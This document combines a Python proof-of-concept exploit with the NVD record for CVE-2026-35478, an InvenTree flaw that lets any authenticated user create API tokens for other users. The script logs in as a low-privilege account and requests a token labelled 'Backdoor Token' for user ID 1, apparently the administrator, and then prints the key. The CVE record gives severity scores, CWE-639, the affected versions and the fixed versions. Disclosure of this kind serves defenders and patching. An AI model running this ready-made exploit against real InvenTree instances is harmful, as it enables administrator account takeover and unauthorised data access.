CVE-2026-35478

import requests import json # Configuration target_url = "http://localhost:8000" api_endpoint = f"{target_url}/api/user/tokens/" # Attacker's credentials (Low privilege user) attacker_username = "lowpriv_user" attacker_password = "password123" # Target User ID (e.g., Administrator ID is usually 1) target_user_id = 1 def login_and_get_token(): """Login as attacker and retrieve auth token""" login_url = f"{target_url}/api/auth/token/" data = { "username": attacker_username, "password": attacker_password } response = requests.post(login_url, data=data) if response.status_code == 200: return response.json().get('token') else: print(f"Login failed: {response.text}") return None def exploit_admin_token_creation(auth_token): """Create a token for the admin user using the attacker's session""" headers = { "Authorization": f"Token {auth_token}", "Content-Type": "application/json" } # Payload to create token for target_user_id (Admin) payload = { "user": target_user_id, "label": "Backdoor Token", "write": True, "read": True } print(f"[*] Attempting to create token for User ID: {target_user_id}...") response = requests.post(api_endpoint, headers=headers, json=payload) if response.status_code == 201: print("[+] Success! Token created.") print(f"[+] Admin Token Key: {response.json().get('key')}") else: print(f"[-] Exploit failed. Status: {response.status_code}") print(f"[-] Response: {response.text}") if __name__ == "__main__": token = login_and_get_token() if token: exploit_admin_token_creation(token)

{"cve": {"id": "CVE-2026-35478", "sourceIdentifier": "[email protected]", "published": "2026-04-08T20:16:24.630", "lastModified": "2026-04-20T15:12:03.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InvenTree is an Open Source Inventory Management System. From 0.16.0 to before 1.2.7, any authenticated InvenTree user can create a valid API token attributed to any other user in the system — including administrators and superusers — by supplying the target's user ID in the user field of a POST /api/user/tokens/ request. The returned token is immediately usable for full API authentication as the target user, from any network location, with no further interaction required. This vulnerability is fixed in 1.2.7 and 1.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:inventree_project:inventree:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.16.0", "versionEndIncluding": "1.2.6", "matchCriteriaId": "ADB98168-9764-4D5D-9DF9-44D08A33DC26"}]}]}], "references": [{"url": "https://github.com/inventree/InvenTree/security/advisories/GHSA-qh5j-c28q-c4rg", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}